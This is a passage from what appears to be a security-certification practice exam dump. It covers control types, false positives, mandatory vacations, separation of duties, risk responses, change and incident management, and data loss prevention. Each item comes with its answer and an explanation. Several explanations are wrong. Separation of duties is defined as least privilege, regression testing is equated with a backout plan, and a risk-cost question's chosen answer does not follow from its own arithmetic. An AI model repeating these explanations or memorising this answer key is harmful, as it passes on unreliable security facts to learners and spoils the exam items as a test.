Answer: DExplanation: 802.1q is a standard that defines a system of VLAN tagging for Ethernet frames. The purpose of atagged port is to pass traffic for multiple VLAN's.Incorrect Options:A: 802.11x provides an authentication mechanism to devices wishing to attach to a LAN or WLAN.B: VLAN Q-in-Q allows multiple VLAN tags to be inserted into a single frame.C: The purpose an untagged port is to accept traffic for a single VLAN only.Reference:https://en.wikipedia.org/wiki/IEEE_802.1Qhttps://documentation.meraki.com/zGeneral_Administration/Tools_and_Troubleshooting/Fundamentals_of_802.1Q_VLAN_Tagginghttps://en.wikipedia.org/wiki/IEEE_802.1Xhttps://en.wikipedia.org/wiki/IEEE_802.1ad |
|
|
Three of the primary security control types that can be implemented are. A. Supervisory, subordinate, and peer. B. Personal, procedural, and legal. C. Operational, technical, and management. D. Mandatory, discretionary, and permanent. |
Answer: CExplanation: The National Institute of Standards and Technology (NIST) places controls into various types. Thecontrol types fall into three categories: Management, Operational, and Technical |
|
|
Which of the following technical controls is BEST used to define which applications a user caninstall and run on a company issued mobile device? A. Authentication B. Blacklisting C. Whitelisting D. Acceptable use policy |
Answer: CExplanation: White lists are closely related to ACLs and essentially, a white list is a list of items that areallowed. |
|
|
To help prevent unauthorized access to PCs, a security administrator implements screen saversthat lock the PC after five minutes of inactivity. Which of the following controls is being describedin this situation? A. Management B. Administrative C. Technical D. Operational |
Answer: CExplanation: controls such as preventing unauthorized access to PC’s and applying screensavers that lock thePC after five minutes of inactivity is a technical control type, the same as Identification andAuthentication, Access Control, Audit and Accountability as well as System and CommunicationProtection. |
|
|
Which of the following is a management control?A. Logon banners B. Written security policy C. SYN attack prevention D. Access Control List (ACL) |
Answer: BExplanation: Management control types include risk assessment, planning, systems and Services Acquisitionas well as Certification, Accreditation and Security Assessment; and written security policy falls inthis category |
|
|
Which of the following can result in significant administrative overhead from incorrect reporting? A. Job rotation B. Acceptable usage policies C. False positives D. Mandatory vacations |
Answer: CExplanation: False positives are essentially events that are mistakenly flagged and are not really events to beconcerned about. This causes a significant administrative overhead because the reporting is what results in the false positives |
|
|
A vulnerability scan is reporting that patches are missing on a server. After a review, it isdetermined that the application requiring the patch does not exist on the operating system.Which of the following describes this cause?
A. Application hardening B. False positive C. Baseline code review D. False negative |
Answer: BExplanation: False positives are essentially events that are mistakenly flagged and are not really events to beconcerned about. |
|
|
Ann, a security technician, is reviewing the IDS log files. She notices a large number of alerts formulticast packets from the switches on the network. After investigation, she discovers that this isnormal activity for her network. Which of the following BEST describes these results? A. True negatives B. True positives C. False positives D. False negatives |
Answer: CExplanation: False positives are essentially events that are mistakenly flagged and are not really events to beconcerned about. |
|
|
Which of the following is an example of a false negative? A. The IDS does not identify a buffer overflow. B. Anti-virus identifies a benign application as malware. C. Anti-virus protection interferes with the normal operation of an application. D. A user account is locked out after the user mistypes the password too many times. |
Answer: AExplanation: With a false negative, you are not alerted to a situation when you should be alerted. |
|
|
A company storing data on a secure server wants to ensure it is legally able to dismiss andprosecute staff who intentionally access the server via Telnet and illegally tamper with customerdata. Which of the following administrative controls should be implemented to BEST achieve this? A. Command shell restrictions B. Restricted interface C. Warning banners D. Session output pipe to /dev/null |
Answer: CExplanation: Within Microsoft Windows, you have the ability to put signs (in the form of onscreen pop-upbanners) that appear before the login telling similar information—authorized access only, violatorswill be prosecuted, and so forth. Such banners convey warnings or regulatory information to theuser that they must “accept” in order to use the machine or network. You need to make staff awarethat they may legally be prosecuted and a message is best given via a banner so that all staffusing workstation will get notification. |
|
|
Joe, a security analyst, asks each employee of an organization to sign a statement saying thatthey understand how their activities may be monitored. Which of the following BEST describes thisstatement? (Select TWO).
A. Acceptable use policy B. Risk acceptance policy C. Privacy policy D. Email policy E. Security policy |
Answer: A,CExplanation: Privacy policies define what controls are required to implement and maintain the sanctity of dataprivacy in the work environment. Privacy policy is a legal document that outlines how datacollected is secured. It should encompass information regarding the information the companycollects, privacy choices you have based on your account, potential information sharing of yourdata with other parties, security measures in place, and enforcement.Acceptable use policies (AUPs) describe how the employees in an organization can use companysystems and resources, both software and hardware. |
|
|
Joe, a newly hired employee, has a corporate workstation that has been compromised due toseveral visits to P2P sites. Joe insisted that he was not aware of any company policy that prohibitsthe use of such web sites. Which of the following is the BEST method to deter employees from theimproper use of the company’s information systems? A. Acceptable Use Policy B. Privacy Policy C. Security Policy D. Human Resource Policy |
Answer: AExplanation: Acceptable use policies (AUPs) describe how the employees in an organization can use companysystems and resources, both software and hardware. |
|
|
Pete, a security analyst, has been informed that the development team has plans to develop anapplication which does not meet the company’s password policy. Which of the following shouldPete do NEXT? A. Contact the Chief Information Officer and ask them to change the company password policy sothat the application is made compliant. B. Tell the application development manager to code the application to adhere to the company’spassword policy. C. Ask the application development manager to submit a risk acceptance memo so that the issuecan be documented. D. Inform the Chief Information Officer of non-adherence to the security policy so that thedevelopers can be reprimanded. |
Answer: BExplanation: Since the application is violating the security policy it should be coded differently to comply withthe password policy. |
|
|
A major security risk with co-mingling of hosts with different security requirements is: A. Security policy violations. B. Zombie attacks. C. Password compromises. D. Privilege creep. |
Answer: AExplanation: The entire network is only as strong as the weakest host. Thus with the co-mingling of hosts withdifferent security requirements would be risking security policy violations. |
|
|
Which of the following provides the BEST explanation regarding why an organization needs toimplement IT security policies? A. To ensure that false positives are identified B. To ensure that staff conform to the policy C. To reduce the organizational risk D. To require acceptable usage of IT systems |
Answer: CExplanation: Once risks has been identified and assessed then there are five possible actions that should betaken. These are: Risk avoidance, Risk transference, Risk mitigation, Risk deterrence and Riskacceptance. Anytime you engage in steps to reduce risk, you are busy with risk mitigation andimplementing IT security policy is a risk mitigation strategy. |
|
|
Which of the following should Pete, a security manager, implement to reduce the risk ofemployees working in collusion to embezzle funds from their company? A. Privacy Policy B. Least Privilege C. Acceptable Use D. Mandatory Vacations |
Answer: DExplanation: A mandatory vacation policy requires all users to take time away from work to refresh. But not onlydoes mandatory vacation give the employee a chance to refresh, but it also gives the company achance to make sure that others can fill in any gaps in skills and satisfies the need to havereplication or duplication at all levels as well as an opportunity to discover fraud. |
|
|
Two members of the finance department have access to sensitive information. The company isconcerned they may work together to steal information. Which of the following controls could beimplemented to discover if they are working together? A. Least privilege access B. Separation of duties C. Mandatory access control D. Mandatory vacations |
Answer: DExplanation: A mandatory vacation policy requires all users to take time away from work to refresh. Mandatoryvacation give the employee a chance to refresh, but it also gives the company a chance to makesure that others can fill in any gaps in skills and satisfies the need to have replication or duplicationat all levels. Mandatory vacations also provide an opportunity to discover fraud. In this casemandatory vacations can prevent the two members from colluding to steal the information thatthey have access to. |
|
|
Mandatory vacations are a security control which can be used to uncover which of the following? A. Fraud committed by a system administrator B. Poor password security among users C. The need for additional security staff D. Software vulnerabilities in vendor code |
Answer: AExplanation: Mandatory vacations also provide an opportunity to discover fraud apart from the obvious benefitsof giving employees a chance to refresh and making sure that others in the company can fill thosepositions and make the company less dependent on those persons; a sort pf replication andduplication at all levels. |
|
|
While rarely enforced, mandatory vacation policies are effective at uncovering: A. Help desk technicians with oversight by multiple supervisors and detailed quality controlsystems. B. Collusion between two employees who perform the same business function. C. Acts of incompetence by a systems engineer designing complex architectures as a member ofa team. D. Acts of gross negligence on the part of system administrators with unfettered access to systemand no oversight. |
Answer: DExplanation: Least privilege (privilege reviews) and job rotation is done when mandatory vacations areimplemented. Then it will uncover areas where the system administrators neglected to check allusers’ privileges since the other users must fill in their positions when they are on their mandatoryvacation. |
|
|
A company that has a mandatory vacation policy has implemented which of the following controls? A. Risk control B. Privacy control C. Technical control D. Physical control |
Answer: AExplanation: Risk mitigation is done anytime you take steps to reduce risks. Thus mandatory vacationimplementation is done as a risk control measure because it is a step that is taken as riskmitigation |
|
|
Which of the following should Joe, a security manager, implement to reduce the risk of employeesworking in collusion to embezzle funds from his company? A. Privacy Policy B. Least Privilege C. Acceptable Use D. Mandatory Vacations |
Answer: DExplanation: When one person fills in for another, such as for mandatory vacations, it provides an opportunity tosee what the person is doing and potentially uncover any fraud. |
|
|
A company is looking to reduce the likelihood of employees in the finance department beinginvolved with money laundering. Which of the following controls would BEST mitigate this risk? A. Implement privacy policies B. Enforce mandatory vacations C. Implement a security policy D. Enforce time of day restrictions |
Answer: BExplanation: A mandatory vacation policy requires all users to take time away from work to refresh. And in thesame time it also gives the company a chance to make sure that others can fill in any gaps in skillsand satisfy the need to have replication or duplication at all levels in addition to affording the company an opportunity to discover fraud for when others do the same job in the absence of theregular staff member then there is transparency. |
|
|
The Chief Security Officer (CSO) is concerned about misuse of company assets and wishes todetermine who may be responsible. Which of the following would be the BEST course of action? A. Create a single, shared user account for every system that is audited and logged based upontime of use. B. Implement a single sign-on application on equipment with sensitive data and high-profileshares. C. Enact a policy that employees must use their vacation time in a staggered schedule. D. Separate employees into teams led by a person who acts as a single point of contact forobservation purposes. |
Answer: CExplanation: A policy that states employees should use their vacation time in a staggered schedule is a way ofemploying mandatory vacations. A mandatory vacation policy requires all users to take time awayfrom work while others step in and do the work of that employee on vacation. This will afford theCSO the opportunity to see who is using the company assets responsibly and who is abusing it |
|
|
A software developer is responsible for writing the code on an accounting application. Anothersoftware developer is responsible for developing code on a system in human resources. Once ayear they have to switch roles for several weeks.Which of the following practices is being implemented? A. Mandatory vacations B. Job rotation C. Least privilege D. Separation of duties |
Answer: BExplanation: A job rotation policy defines intervals at which employees must rotate through positions. |
|
|
Which of the following types of risk reducing policies also has the added indirect benefit of crosstraining employees when implemented? A. Least privilege B. Job rotation C. Mandatory vacations D. Separation of duties |
Answer: BExplanation: A job rotation policy defines intervals at which employees must rotate through positions. Similar inpurpose to mandatory vacations, it helps to ensure that the company does not become toodependent on one person and it does afford the company with the opportunity to place anotherperson in that same job. |
|
|
In order to prevent and detect fraud, which of the following should be implemented? A. Job rotation B. Risk analysis C. Incident management D. Employee evaluations |
Answer: AExplanation: A job rotation policy defines intervals at which employees must rotate through positions. Similar inpurpose to mandatory vacations, it helps to ensure that the company does not become toodependent on one person and it does afford the company with the opportunity to place anotherperson in that same job and in this way the company can potentially uncover any fraud perhapscommitted by the incumbent. |
|
|
The Chief Technical Officer (CTO) has been informed of a potential fraud committed by adatabase administrator performing several other job functions within the company. Which of thefollowing is the BEST method to prevent such activities in the future? A. Job rotation B. Separation of duties C. Mandatory Vacations D. Least Privilege |
Answer: BExplanation: Separation of duties means that users are granted only the permissions they need to do their workand no more. More so it means that you are employing best practices. The segregation of dutiesand separation of environments is a way to reduce the likelihood of misuse of systems orinformation. A separation of duties policy is designed to reduce the risk of fraud and to preventother losses in an organization. |
|
|
Separation of duties is often implemented between developers and administrators in order toseparate which of the following? A. More experienced employees from less experienced employees B. Changes to program code and the ability to deploy to production C. Upper level management users from standard development employees D. The network access layer from the application access layer |
Answer: BExplanation: Separation of duties means that there is differentiation between users, employees and duties perse which form part of best practices. |
|
|
A user in the company is in charge of various financial roles but needs to prepare for an upcomingaudit. They use the same account to access each financial system. Which of the following securitycontrols will MOST likely be implemented within the company? A. Account lockout policy B. Account password enforcement C. Password complexity enabled D. Separation of duties |
Answer: DExplanation: Separation of duties means that users are granted only the permissions they need to do their workand no more. More so it means that there is differentiation between users, employees and dutiesper se which form part of best practices. |
|
|
Everyone in the accounting department has the ability to print and sign checks. Internal audit hasasked that only one group of employees may print checks while only two other employees maysign the checks. Which of the following concepts would enforce this process? A. Separation of Duties B. Mandatory Vacations C. Discretionary Access Control D. Job Rotation |
Answer: AExplanation: Separation of duties means that users are granted only the permissions they need to do their workand no more. |
|
|
One of the system administrators at a company is assigned to maintain a secure computer lab.The administrator has rights to configure machines, install software, and perform user accountmaintenance. However, the administrator cannot add new computers to the domain, because thatrequires authorization from the Information Assurance Officer. This is an example of which of thefollowing? A. Mandatory access B. Rule-based access control C. Least privilege D. Job rotation |
Answer: CExplanation: A least privilege policy should be used when assigning permissions. Give users only thepermissions that they need to do their work and no more |
|
|
A security administrator notices that a specific network administrator is making unauthorizedchanges to the firewall every Saturday morning. Which of the following would be used to mitigatethis issue so that only security administrators can make changes to the firewall? A. Mandatory vacations B. Job rotation C. Least privilege D. Time of day restrictions |
Answer: CExplanation: A least privilege policy is to give users only the permissions that they need to do their work and nomore. That is only allowing security administrators to be able to make changes to the firewall bypracticing the least privilege principle. |
|
|
Which of the following risk mitigation strategies will allow Ann, a security analyst, to enforce leastprivilege principles? A. User rights reviewsB. Incident managementC. Risk based controlsD. Annual loss expectancy |
Answer: AExplanation: A least privilege policy should be used when assigning permissions. Give users only thepermissions and rights that they need to do their work and no more. |
|
|
An IT security manager is asked to provide the total risk to the business. Which of the following calculations would he security manager choose to determine total risk? A. (Threats X vulnerability X asset value) x controls gap B. (Threats X vulnerability X profit) x asset value C. Threats X vulnerability X control gap D. Threats X vulnerability X asset value |
Answer: DExplanation: Threats X vulnerability X asset value is equal to asset value (AV) times exposure factor (EF). Thisis used to calculate a risk. |
|
|
A company is preparing to decommission an offline, non-networked root certificate server. Beforesending the server’s drives to be destroyed by a contracted company, the Chief Security Officer(CSO) wants to be certain that the data will not be accessed. Which of the following, ifimplemented, would BEST reassure the CSO? (Select TWO). A. Disk hashing procedures B. Full disk encryption C. Data retention policies D. Disk wiping procedures E. Removable media encryption |
Answer: B,DExplanation: B: Full disk encryption is when the entire volume is encrypted; the data is not accessible tosomeone who might boot another operating system in an attempt to bypass the computer’ssecurity. Full disk encryption is sometimes referred to as hard drive encryption.D: Disk wiping is the process of overwriting data on the repeatedly, or using a magnet to alter themagnetic structure of the disks. This renders the data unreadable. |
|
|
Identifying residual risk is MOST important to which of the following concepts? A. Risk deterrence B. Risk acceptance C. Risk mitigation D. Risk avoidance |
Answer: BExplanation: Risk acceptance is often the choice you must make when the cost of implementing any of theother four choices exceeds the value of the harm that would occur if the risk came to fruition. Totruly qualify as acceptance, it cannot be a risk where the administrator or manager is unaware ofits existence; it has to be an identified risk for which those involved understand the potential costor damage and agree to accept it. Residual risk is always present and will remain a risk thus itshould be accepted (risk acceptance) |
|
|
A software company has completed a security assessment. The assessment states that thecompany should implement fencing and lighting around the property. Additionally, the assessmentstates that production releases of their software should be digitally signed. Given therecommendations, the company was deficient in which of the following core security areas?(Select TWO). A. Fault tolerance B. Encryption C. Availability D. Integrity E. Safety F. Confidentiality |
Answer: D,EExplanation: Aspects such as fencing, proper lighting, locks, CCTV, Escape plans Drills, escape routes andtesting controls form part of safety controls.Integrity refers to aspects such as hashing, digital signatures, certificates and non-repudiation – allof which has to do with data integrity. |
|
|
Which of the following defines a business goal for system restoration and acceptable data loss?A. MTTR B. MTBF C. RPO D. Warm site |
Answer: CExplanation: The recovery point objective (RPO) defines the point at which the system needs to be restored.This could be where the system was two days before it crashed (whip out the old backup tapes) orfive minutes before it crashed (requiring complete redundancy). This is an essential business goalinsofar as system restoration and acceptable data loss is concerned. |
|
|
Sara, the Chief Security Officer (CSO), has had four security breaches during the past two years.Each breach has cost the company $3,000. A third party vendor has offered to repair the securityhole in the system for $25,000. The breached system is scheduled to be replaced in five years. Which of the following should Sara do to address the risk? A. Accept the risk saving $10,000. B. Ignore the risk saving $5,000. C. Mitigate the risk saving $10,000. D. Transfer the risk saving $5,000. |
Answer: DExplanation: Risk transference involves sharing some of the risk burden with someone else, such as aninsurance company. The cost of the security breach over a period of 5 years would amount to$30,000 and it is better to save $5,000. |
|
|
Which of the following concepts are included on the three sides of the "security triangle"? (SelectTHREE). A. Confidentiality B. Availability C. Integrity D. Authorization E. Authentication F. Continuity |
Answer: A,B,CExplanation: Confidentiality, integrity, and availability are the three most important concepts in security. Thusthey form the security triangle. |
|
|
Elastic cloud computing environments often reuse the same physical hardware for multiplecustomers over time as virtual machines are instantiated and deleted. This has importantimplications for which of the following data security concerns? A. Hardware integrity B. Data confidentiality C. Availability of servers D. Integrity of data |
Answer: BExplanation: Data that is not kept separate or segregated will impact on that data’s confidentiality maybe beingcompromised. Be aware of the fact that your data is only as safe as the data with which it isintegrated. For example, assume that your client database is hosted on a server that anothercompany is also using to test an application that they are creating. If their application obtains rootlevel access at some point (such as to change passwords) and crashes at that point, then the userrunning the application could be left with root permissions and conceivably be to access data onthe server for which they are not authorized, such as your client database. Data segregation iscrucial; keep your data on secure servers. |
|
|
The system administrator notices that their application is no longer able to keep up with the largeamounts of traffic their server is receiving daily. Several packets are dropped and sometimes theserver is taken offline. Which of the following would be a possible solution to look into to ensuretheir application remains secure and available? A. Cloud computing B. Full disk encryption C. Data Loss Prevention D. HSM |
Answer: AExplanation: Cloud computing means hosting services and data on the Internet instead of hosting it locally.There is thus no issue when the company’s server is taken offline. |
|
|
Users can authenticate to a company’s web applications using their credentials from a popularsocial media site. Which of the following poses the greatest risk with this integration? A. Malicious users can exploit local corporate credentials with their social media credentialsB. Changes to passwords on the social media site can be delayed from replicating to the company C. Data loss from the corporate servers can create legal liabilities with the social media siteD. Password breaches to the social media site affect the company application as well |
Answer: D Explanation: Social networking and having you company’s application authentication ‘linked’ to users’ credentialthat they use on social media sites exposes your company’s application exponentially more than isnecessary. You should strive to practice risk avoidance. |
|
|
Which of the following is the GREATEST security risk of two or more companies working togetherunder a Memorandum of Understanding? A. Budgetary considerations may not have been written into the MOU, leaving an entity to absorbmore cost than intended at signing.B. MOUs have strict policies in place for services performed between the entities and the penaltiesfor compromising a partner are high.C. MOUs are generally loose agreements and therefore may not have strict guidelines in place toprotect sensitive data between the two entities.D. MOUs between two companies working together cannot be held to the same legal standards asSLAs. |
Answer: CExplanation: The Memorandum of Understanding This document is used in many settings in the informationindustry. It is a brief summary of which party is responsible for what portion of the work. Forexample, Company A may be responsible for maintaining the database server and Company Bmay be responsible for telecommunications. MOUs are not legally binding but they carry a degreeof seriousness and mutual respect, stronger than a gentlemen’s agreement. Often, MOUs are thefirst steps towards a legal contract. |
|
|
Which of the following describes the purpose of an MOU?A. Define interoperability requirementsB. Define data backup processC. Define onboard/offboard procedureD. Define responsibilities of each party |
Answer: DExplanation: MOU or Memorandum of Understanding is a document outlining which party is responsible forwhat portion of the work |
|
|
A company has decided to move large data sets to a cloud provider in order to limit the costs ofnew infrastructure. Some of the data is sensitive and the Chief Information Officer wants to makesure both parties have a clear understanding of the controls needed to protect the data.Which of the following types of interoperability agreement is this?A. ISAB. MOUC. SLAD. BPA |
Answer: AExplanation: ISA/ Interconnection Security Agreement is an agreement between two organizations that haveconnected systems. The agreement documents the technical requirements of the connectedsystems. |
|
|
Which of the following is the primary security concern when deploying a mobile device on anetwork?A. Strong authenticationB. InteroperabilityC. Data securityD. Cloud storage technique |
Answer: CExplanation: Mobile devices, such as laptops, tablet computers, and smartphones, provide security challengesabove those of desktop workstations, servers, and such in that they leave the office and thisincreases the odds of their theft which makes data security a real concern. At a bare minimum, thefollowing security measures should be in place on mobile devices: Screen lock, Strong password,Device encryption, Remote Wipe or Sanitation, voice encryption, GPS tracking, Application control, storage segmentation, asses tracking and device access control |
|
|
A security administrator plans on replacing a critical business application in five years. Recently,there was a security flaw discovered in the application that will cause the IT department tomanually re-enable user accounts each month at a cost of $2,000. Patching the application todaywould cost $140,000 and take two months to implement. Which of the following should the securityadministrator do in regards to the application?A. Avoid the risk to the user base allowing them to re-enable their own accountsB. Mitigate the risk by patching the application to increase security and saving moneyC. Transfer the risk replacing the application now instead of in five yearsD. Accept the risk and continue to enable the accounts each month saving money |
Answer: DExplanation: This is a risk acceptance measure that has to be implemented since the cost of patching would betoo high compared to the cost to keep the system going as is. Risk acceptance is often the choiceyou must make when the cost of implementing any of the other four choices (i.e. risk deterrence,mitigation, transference or avoidance) exceeds the value of the harm that would occur if the riskcame to fruition. |
|
|
Acme Corp has selectively outsourced proprietary business processes to ABC Services. Due tosome technical issues, ABC services wants to send some of Acme Corp’s debug data to a thirdparty vendor for problem resolution. Which of the following MUST be considered prior to sendingdata to a third party?A. The data should be encrypted prior to transportB. This would not constitute unauthorized data sharingC. This may violate data ownership and non-disclosure agreementsD. Acme Corp should send the data to ABC Services’ vendor instead |
Answer: CExplanation: With sending your data to a third party is already a risk since the third party may have a differentpolicy than yours. Data ownership and non-disclosure is already a risk that you will have to acceptsince the data will be sent for debugging /troubleshooting purposes which will result in definite disclosure of the data |
|
|
An administrator wants to minimize the amount of time needed to perform backups during theweek. It is also acceptable to the administrator for restoration to take an extended time frame.Which of the following strategies would the administrator MOST likely implement? A. Full backups on the weekend and incremental during the weekB. Full backups on the weekend and full backups every dayC. Incremental backups on the weekend and differential backups every dayD. Differential backups on the weekend and full backups every day |
Answer: AExplanation: A full backup is a complete, comprehensive backup of all fi les on a disk or server. The full backupis current only at the time it’s performed. Once a full backup is made, you have a complete archiveof the system at that point in time. A system shouldn’t be in use while it undergoes a full backupbecause some fi les may not get backed up. Once the system goes back into operation, thebackup is no longer current. A full backup can be a time-consuming process on a large system.An incremental backup is a partial backup that stores only the information that has been changedsince the last full or the last incremental backup. If a full backup were performed on a Sundaynight, an incremental backup done on Monday night would contain only the information thatchanged since Sunday night. Such a backup is typically considerably smaller than a full backup.Each incremental backup must be retained until a full backup can be performed. Incrementalbackups are usually the fastest backups to perform on most systems, and each incrementalbackup tape is relatively small. |
|
|
A security administrator needs to update the OS on all the switches in the company. Which of thefollowing MUST be done before any actual switch configuration is performed? A. The request needs to be sent to the incident management team.B. The request needs to be approved through the incident management process.C. The request needs to be approved through the change management process.D. The request needs to be sent to the change management team. |
Answer: CExplanation: Change Management is a risk mitigation approach and refers to the structured approach that isfollowed to secure a company’s assets. Thus the actual switch configuration should first be subjectto the change management approval. |
|
|
Developers currently have access to update production servers without going through an approvalprocess. Which of the following strategies would BEST mitigate this risk? A. Incident managementB. Clean desk policyC. Routine auditsD. Change management |
Answer: DExplanation: Change Management is a risk mitigation approach and refers to the structured approach that isfollowed to secure a company’s assets. This structured approach involves policies that should bein place and technological controls that should be enforced. |
|
|
Which of the following mitigation strategies is established to reduce risk when performing updatesto business critical systems?A. Incident managementB. Server clusteringC. Change managementD. Forensic analysis |
Answer: CExplanation: Change Management is a risk mitigation approach and refers to the structured approach that isfollowed to secure a company’s assets. In this case ‘performing updates to business criticalsystems. |
|
|
The network administrator is responsible for promoting code to applications on a DMZ web server.Which of the following processes is being followed to ensure application integrity?A. Application hardeningB. Application firewall reviewC. Application change managementD. Application patch management |
Answer: CExplanation: Change management is the structured approach that is followed to secure a company’s assets.Promoting code to application on a SMZ web server would be change management. |
|
|
Which of the following MOST specifically defines the procedures to follow when scheduled systempatching fails resulting in system outages?A. Risk transferenceB. Change managementC. Configuration managementD. Access control revalidation |
Answer: BExplanation: Change Management is a risk mitigation approach and refers to the structured approach that isfollowed to secure a company’s assets. In this case ‘scheduled system patching’ |
|
|
A security engineer is given new application extensions each month that need to be secured priorto implementation. They do not want the new extensions to invalidate or interfere with existingapplication security. Additionally, the engineer wants to ensure that the new requirements areapproved by the appropriate personnel. Which of the following should be in place to meet thesetwo goals? (Select TWO). A. Patch Audit PolicyB. Change Control Policy C. Incident Management PolicyD. Regression Testing PolicyE. Escalation PolicyF. Application Audit Policy |
Answer: B,DExplanation: A backout (regression testing) is a reversion from a change that had negative consequences. Itcould be, for example, that everything was working fi ne until you installed a service pack on aproduction machine, and then services that were normally available were no longer accessible.The backout, in this instance, would revert the system to the state that it was in before the servicepack was applied. Backout plans can include uninstalling service packs, hotfi xes, and patches,but they can also include reversing a migration and using previous firmware. A key component tocreating such a plan is identifying what events will trigger your implementing the backout.A change control policy refers to the structured approach that is followed to secure a company’sassets in the event of changes occurring. |
|
|
A user has received an email from an external source which asks for details on the company’snew product line set for release in one month. The user has a detailed spec sheet but it is marked"Internal Proprietary Information". Which of the following should the user do NEXT?A. Contact their manager and request guidance on how to best move forwardB. Contact the help desk and/or incident response team to determine next stepsC. Provide the requestor with the email information since it will be released soon anywayD. Reply back to the requestor to gain their contact information and call them |
Answer: BExplanation: This is an incident that has to be responded to by the person who discovered it- in this case theuser. An incident is any attempt to violate a security policy, a successful penetration, acompromise of a system, or any unauthorized access to information. It’s important that an incidentresponse policy establish at least the following items:Outside agencies that should be contacted or notified in case of an incidentResources used to deal with an incidentProcedures to gather and secure evidenceList of information that should be collected about an incidentOutside experts who can be used to address issues if neededPolicies and guidelines regarding how to handle an incident Since the spec sheet has been marked Internal Proprietary Information the user should refer theincident to the incident response team |
|
|
Which of the following is BEST carried out immediately after a security breach is discovered?A. Risk transferenceB. Access control revalidationC. Change managementD. Incident management |
Answer: DExplanation: Incident management is the steps followed when security incident occurs. |
|
|
A security analyst informs the Chief Executive Officer (CEO) that a security breach has justoccurred. This results in the Risk Manager and Chief Information Officer (CIO) being caughtunaware when the CEO asks for further information. Which of the following strategies should beimplemented to ensure the Risk Manager and CIO are not caught unaware in the future?A. Procedure and policy managementB. Chain of custody managementC. Change managementD. Incident management |
Answer: DExplanation: incident management refers to the steps followed when events occur (making sure controls are inplace to prevent unauthorized access to, and changes of, all IT assets). The events that couldoccur include security breaches. |
|
|
Requiring technicians to report spyware infections is a step in which of the following? A. Routine auditsB. Change managementC. Incident managementD. Clean desk policy |
Answer: CExplanation: Incident management refers to the steps followed when events occur (making sure controls are inplace to prevent unauthorized access to, and changes of, all IT assets). |
|
|
Which of the following is the BEST approach to perform risk mitigation of user access controlrights?A. Conduct surveys and rank the results.B. Perform routine user permission reviews.C. Implement periodic vulnerability scanning.D. Disable user accounts that have not been used within the last two weeks |
Answer: BExplanation: Risk mitigation is accomplished any time you take steps to reduce risk. This category includesinstalling antivirus software, educating users about possible threats, monitoring network traffic,adding a firewall, and so on. User permissions may be the most basic aspect of security and isbest coupled with a principle of least privilege. And related to permissions is the concept of theaccess control list (ACL). An ACL is literally a list of who can access what resource and at whatlevel. Thus the best risk mitigation steps insofar as access control rights are concerned, is theregular/routine review of user permissions. |
|
|
An internal auditor is concerned with privilege creep that is associated with transfers inside thecompany. Which mitigation measure would detect and correct this?A. User rights reviewsB. Least privilege and job rotationC. Change managementD. Change Control |
Answer: AExplanation: A privilege audit is used to determine that all groups, users, and other accounts have theappropriate privileges assigned according to the policies of an organization. This means that auser rights review will reveal whether user accounts have been assigned according to their ‘new’job descriptions , or if there are privilege creep culprits after transfers has occurred. |
|
|
A security administrator is responsible for performing periodic reviews of user permission settingsdue to high turnover and internal transfers at a corporation. Which of the following BEST describesthe procedure and security rationale for performing such reviews? A. Review all user permissions and group memberships to ensure only the minimum set ofpermissions required to perform a job is assigned.B. Review the permissions of all transferred users to ensure new permissions are granted so theemployee can work effectively.C. Ensure all users have adequate permissions and appropriate group memberships, so thevolume of help desk calls is reduced.D. Ensure former employee accounts have no permissions so that they cannot access anynetwork file stores and resources. |
Answer: AExplanation: Reviewing user permissions and group memberships form part of a privilege audit is used todetermine that all groups, users, and other accounts have the appropriate privileges assignedaccording to the policies of the corporation. |
|
|
Various network outages have occurred recently due to unapproved changes to network andsecurity devices. All changes were made using various system credentials. The security analysthas been tasked to update the security policy. Which of the following risk mitigation strategieswould also need to be implemented to reduce the number of network outages due to unauthorizedchanges? A. User rights and permissions reviewB. Configuration managementC. Incident managementD. Implement security controls on Layer 3 devices |
Answer: AExplanation: Reviewing user rights and permissions can be used to determine that all groups, users, and otheraccounts have the appropriate privileges assigned according to the policies of the corporation andtheir job descriptions. Also reviewing user rights and permissions will afford the security analystthe opportunity to put the principle of least privilege in practice as well as update the securitypolicy |
|
|
After an audit, it was discovered that the security group memberships were not properly adjustedfor employees’ accounts when they moved from one role to another. Which of the following hasthe organization failed to properly implement? (Select TWO). A. Mandatory access control enforcement.B. User rights and permission reviews.C. Technical controls over account management.D. Account termination procedures.E. Management controls over account management.F. Incident management and response plan. |
Answer: B,EExplanation: Reviewing user rights and permissions can be used to determine that all groups, users, and otheraccounts have the appropriate privileges assigned according to the policies of the corporation andtheir job descriptions since they were all moved to different roles.Control over account management would have taken into account the different roles thatemployees have and adjusted the rights and permissions of these roles accordingly. |
|
|
The security administrator is currently unaware of an incident that occurred a week ago. Which ofthe following will ensure the administrator is notified in a timely manner in the future? A. User permissions reviewsB. Incident response teamC. Change managementD. Routine auditing |
Answer: D Explanation: Routine audits are carried out after you have implemented security controls based on risk. Theseaudits include aspects such as user rights and permissions and specific events. |
|
|
The system administrator has deployed updated security controls for the network to limit risk ofattack. The security manager is concerned that controls continue to function as intended tomaintain appropriate security posture.Which of the following risk mitigation strategies is MOST important to the security manager? A. User permissionsB. Policy enforcementC. Routine auditsD. Change management |
Answer: CExplanation: After you have implemented security controls based on risk, you must perform routine audits.These audits should include reviews of user rights and permissions as well as specific events. Youshould pay particular attention to false positives and negatives. |
|
|
Which of the following security account management techniques should a security analystimplement to prevent staff, who has switched company roles, from exceeding privileges?A. Internal account auditsB. Account disablementC. Time of day restrictionD. Password complexity |
Answer: AExplanation: Internal account auditing will allow you to switch the appropriate users to the proper accountsrequired after the switching of roles occurred and thus check that the principle of least privilege isfollowed. |
|
|
Encryption of data at rest is important for sensitive information because of which of the following?A. Facilitates tier 2 support, by preventing users from changing the OSB. Renders the recovery of data harder in the event of user password lossC. Allows the remote removal of data following eDiscovery requestsD. Prevents data from being accessed following theft of physical equipment |
Answer: DExplanation: Data encryption allows data that has been stolen to remain out of the eyes of the intruders whotook it as long as they do not have the proper passwords. |
|
|
A company is trying to limit the risk associated with the use of unapproved USB devices to copydocuments. Which of the following would be the BEST technology control to use in this scenario?A. Content filteringB. IDSC. Audit logsD. DLP |
Answer: DExplanation: Data loss prevention (DLP) is a strategy for making sure that end users do not send sensitive orcritical information outside the corporate network. The term is also used to describe softwareproducts that help a network administrator control what data end users can transfer. |
|
|
Several employees have been printing files that include personally identifiable information ofcustomers. Auditors have raised concerns about the destruction of these hard copies after theyare created, and management has decided the best way to address this concern is by preventingthese files from being printed.Which of the following would be the BEST control to implement? A. File encryptionB. Printer hardeningC. Clean desk policiesD. Data loss prevention |
